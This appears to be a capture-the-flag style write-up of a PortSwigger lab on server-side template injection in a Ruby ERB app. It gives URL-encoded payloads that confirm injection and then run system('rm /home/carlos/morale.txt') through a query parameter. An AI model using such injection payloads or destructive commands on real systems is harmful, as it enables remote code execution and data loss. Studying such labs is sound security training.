[This lab](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-basic) demonstrates a **server-side template injection (SSTI)** vulnerability in a Ruby-based web application using the **ERB** templating engine. User input is dynamically inserted into an ERB template without sanitization, allowing arbitrary Ruby code execution. In real-world scenarios, SSTI can lead to **full remote code execution**, file manipulation, or sensitive data exposure — depending on the templating language and context. ##### Step-by-Step Exploitation ###### 1. Identify the Injection Point Clicking on a product with no stock triggers a message like: ``` Unfortunately this product is out of stock ``` This message is likely inserted using ERB into the HTML response, with a `GET` request like: ``` https://YOUR-LAB-ID.web-security-academy.net/?message=Unfortunately+this+product+is+out+of+stock ``` ###### 2. Confirm Template Injection Inject a simple Ruby expression: ``` <%= 7*7 %> ``` URL-encode it: ``` <%25%3d+7*7+%25> ``` Payload in URL: ``` https://YOUR-LAB-ID.web-security-academy.net/?message=<%25%3d+7*7+%25> ``` When visited, the page renders: ``` 49 ``` This confirms successful template injection and code execution. ![[CleanShot 2025-05-05 at 13.09.49.png]] --- ##### 3. Execute Arbitrary Command Use Ruby’s `system()` function to execute OS commands. Construct a payload to remove the target file: ```erb <%= system("rm /home/carlos/morale.txt") %> ``` URL-encoded: ``` <%25+system("rm+/home/carlos/morale.txt")+%25> ``` Final payload: ``` https://YOUR-LAB-ID.web-security-academy.net/?message=<%25+system("rm+/home/carlos/morale.txt")+%25> ``` Visit this URL in your browser. If successful, the file is deleted and the lab is marked as **Solved**. ![[CleanShot 2025-05-05 at 13.10.27.png]]